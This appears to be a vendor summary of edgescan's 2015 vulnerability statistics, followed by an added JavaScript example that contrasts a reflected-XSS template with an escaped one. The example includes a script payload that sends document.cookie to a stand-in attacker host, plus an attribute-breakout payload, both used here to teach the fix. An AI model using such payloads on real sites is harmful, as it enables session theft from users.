edgescan™ have released their 2015 Vulnerability Statistics Report. edgescan is the only EU-based vulnerability management company listed by Gartner in both the Magic Quadrant for Managed Security Services and the Gartner Hype Cycle for Application Security, and the report draws on that vantage point to show the real state of cybersecurity.
The findings are based on vulnerability data gathered during 2015 through the edgescan SaaS platform, edgescan.com.
“63% of all vulnerabilities discovered could have been mitigated via patch, configuration and component management combined.”
We are still not maintaining our systems in a secure manner. Doing so is not difficult, but it is time-consuming. A major cause is lack of awareness, together with the absence of an adequate patch management process and policy.
“61.4% or 2 of every 3 servers had a cryptographic vulnerability”
In effect, these weaknesses expose users' data to eavesdropping and loss of privacy.
That is a cause for concern, as our economy relies heavily on the privacy and protection of sensitive information. Such weaknesses are regularly exploited by both cybercriminals and nation-state actors, whether to gain a competitive edge in business or to aid identity and financial theft.
“15.1% of Assets have high or critical risk vulnerabilities”
High or critical vulnerabilities are defined as those that are:
- Easily exploitable
- Remotely exploitable
- In some cases, affecting both the application and network layers together
Remediation: Patch management may not be as exciting as other aspects of security, but it remains vital to maintaining a secure and robust posture. Security patches are released by vendors when security bugs are discovered in the applications, frameworks and operating systems they supply; a patch that is not applied leaves a publicly known bug in place.
Client-Side Security is still a significant issue.
Weaknesses such as Cross-Site Scripting (XSS), where an attacker injects script into the page a user's browser renders and can then steal the user's credentials or deliver malware, remain common.
An average of 4.78 vulnerabilities was discovered per web application assessed.
Such weak client-side protections also help an attacker with phishing and malware distribution.
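To make the XSS point above concrete, here is an added example (not code from the report or from edgescan) of the weakness and its fix in a server-side template that echoes a search query back to the user. The payloads, function names and the results page are all constructed for illustration; the escaping table is the standard one for HTML body and quoted-attribute contexts.

```javascript
// Added example: a reflected XSS sink and its hardened counterpart.
// Models a results page that echoes the user's search query back into HTML.
// The two payloads are constructed test strings, not taken from any real incident.

// Classic body-context payload: closes nothing, just injects a <script> tag.
const SCRIPT_PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Attribute-context payload: breaks out of a quoted value to add an event handler.
const ATTRIBUTE_PAYLOAD = '" onfocus="alert(1)" autofocus="';

// VULNERABLE: untrusted input is concatenated straight into HTML.
// Whatever the user typed becomes markup that runs in the site's own origin.
function renderResultsUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Escape the five characters that can start or end a tag, attribute or entity.
// Correct for HTML body text and for values inside double- or single-quoted attributes.
function escapeHtml(s) {
  const table = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (ch) => table[ch]);
}

// HARDENED: same output shape, but the query can no longer open or close a tag.
function renderResultsSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Attribute context: always quote the attribute AND escape quotes inside it,
// otherwise a payload like ATTRIBUTE_PAYLOAD adds its own attributes.
function renderSearchBox(query) {
  return `<input type="text" name="q" value="${escapeHtml(query)}">`;
}

// Crude check used only in this example: does the markup contain a live <script> tag?
// (A real scanner parses the DOM; this is enough to show the difference.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
console.log('unsafe :', renderResultsUnsafe(SCRIPT_PAYLOAD));
console.log('safe   :', renderResultsSafe(SCRIPT_PAYLOAD));
console.log('attr   :', renderSearchBox(ATTRIBUTE_PAYLOAD));
```

The rule the example illustrates is that escaping is context-specific: the same five-character table protects HTML text and quoted attributes, but a value placed inside a URL, a `<script>` block or a CSS property needs that context's own encoding, and on the client side the equivalent of `renderResultsSafe` is assigning user data to `textContent` rather than `innerHTML`.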